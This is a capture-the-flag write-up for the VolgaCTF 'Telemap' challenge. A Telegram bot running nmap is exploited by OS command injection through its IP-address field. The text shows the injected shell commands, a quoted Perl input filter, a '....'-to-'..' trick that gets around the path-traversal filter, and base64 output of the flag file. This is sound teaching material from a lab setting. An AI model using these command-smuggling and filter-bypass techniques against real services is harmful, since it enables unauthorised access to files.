Telemap
200
He is hiding something @VolgaCTFScanner_bot
We are not given much information here, so the first order of business is to find out who @VolgaCTFScanner_bot
is. Twitter search does not have an account by that name. But the organizers use Telegram for the chat, and a quick search reveals that it is indeed a Telegram account.
After connecting to the bot on Telegram we send it a few random words to initiate the conversation. It’s slow to respond, but when it does, it complains about an invalid IP address.
When we send it an IP address we get an NMAP response back!
1
2
3
4
5
6
7
8
9
10
11
12
13
> 80.93.182.205
Starting Nmap 7.01 ( https://nmap.org ) at 2017-03-25 00:21 +04
Nmap scan report for 80.93.182.205
Host is up (0.00025s latency).
PORT STATE SERVICE
21/tcp closed ftp
22/tcp open ssh
23/tcp closed telnet
80/tcp open http
443/tcp open https
3389/tcp closed ms-wbt-server
Nmap done: 1 IP address (1 host up) scanned in 0.04 seconds
I smell OS command injection! Let’s try it:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
> 80.93.182.205 | find
.
./txt
./txt/2.txt
./some-files
./some-files/some-text.txt
./flag-ololo.txt
./img
./img/1.jpg
./img/5.jpg
./img/4.jpg
./img/3.jpg
./img/2.jpg
./img/0.jpg
./1.txt
./telegram-bot.pl
./hello-dear.txt
As we can see there are a number of files in this folder. Examining each one of them with cat
does not bring back a flag, however. And some of the requests fail. telegram-bot.pl
is the source of the bot and after looking at it we see the reason for the failures:
1
2
3
4
5
6
7
8
9
...
$text =~ s/\.\./\./g; # switch .. to .
# filter - / ~ '
if ( $text =~ /[\-\/~'=]/) {
$result = 0;$result_text = "Invalid character";
...
Filtering of ..
and /
make path traversal to other places difficult. However, ..
replacement can be defeated - we can send ....
and have them replaced with ..
:
1
2
3
> 80.93.182.205 | ls ....
bot
F-l-@_G
A-ha, there’s the flag! When we examine the flag file we see that it’s an image, so to exfil let’s Base64-encode it:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
> 80.93.182.205 ; cd .... ; cat F* | base64
Starting Nmap 7.01 ( https://nmap.org ) at 2017-03-25 00:21 +04
Nmap scan report for 80.93.182.205
Host is up (0.00025s latency).
PORT STATE SERVICE
21/tcp closed ftp
22/tcp open ssh
23/tcp closed telnet
80/tcp open http
443/tcp open https
3389/tcp closed ms-wbt-server
Nmap done: 1 IP address (1 host up) scanned in 0.04 seconds
iVBORw0KGgoAAAANSUhEUgAAAZgAAAAqCAIAAAABLNrIAAAAAXNSR0IArs4c6QAAAARnQU1BAACx
jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAf9SURBVHhe7ZjreeQ2DEW3LhfkelzNNrPFbCQA
JPG4oChZsxn5w/kVgXhcgBw4ya+/RVEUD6cWWVEUj6cWWVEUj6cWWVEUj6cWWVEUj6cWWVEUj6cW
WVEUj6cWWVEUj6cWWVEUj6cWWVEUj6cWWVEUj6cWWVEUj6c ...
The image contains the flag - VolgaCTF{jUe33I9@8#dDie#!kdEPz}
.